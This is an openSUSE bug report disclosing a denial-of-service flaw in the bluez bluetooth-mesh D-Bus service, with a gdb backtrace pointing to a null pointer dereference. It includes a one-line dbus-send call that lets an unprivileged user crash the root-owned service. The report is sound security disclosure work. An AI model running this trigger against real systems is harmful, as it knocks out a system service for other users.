Bug ID 1152672
Summary VUL-0: bluez: bluetooth-mesh D-Bus service can be crashed by regular user
Classification openSUSE
Product openSUSE Tumbleweed
Version Current
Hardware Other
OS Other
Status NEW
Severity Normal
Priority P5 - None
Component Security
Assignee seife@novell.slipkontur.de
Reporter matthias.gerstner@suse.com
QA Contact qa-bugs@suse.de
CC matthias.gerstner@suse.com, vbotka@suse.com
Blocks 1151518
Found By ---
Blocker ---

+++ This bug was initially created as a clone of Bug #1151518

The new bluetooth-mesh D-Bus service, which is reviewed in bug 1151518, has a
DoS vulnerability that allows a regular user to crash the root-owned D-Bus
service. To do so, the following D-Bus call can be employed:

$ dbus-send --system --type=method_call --print-reply --dest=org.bluez.mesh
/org/bluez/mesh org.bluez.mesh.Network1.Join objpath:/org/gnome/DisplayManager
array:byte:1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16

After a timeout of about 20 seconds the D-Bus service will crash due to a null
pointer dereference with the following backtrace:

node_init_cb (node=0x0, agent=0x0) at mesh/mesh.c:359
359            reply = dbus_error(join_pending->msg, MESH_ERROR_FAILED,
(gdb) bt
    user_data=0x5555555be170) at mesh/node.c:1760
    dbus=<optimized out>) at ell/dbus.c:216
    user_data=0x5555555a6e00) at ell/dbus.c:279
    user_data=0x5555555a7ef0) at ell/io.c:126
    at ell/main.c:642
    at mesh/main.c:205

The reason is probably that the `join_pending` data structure has already been
freed in a different function.

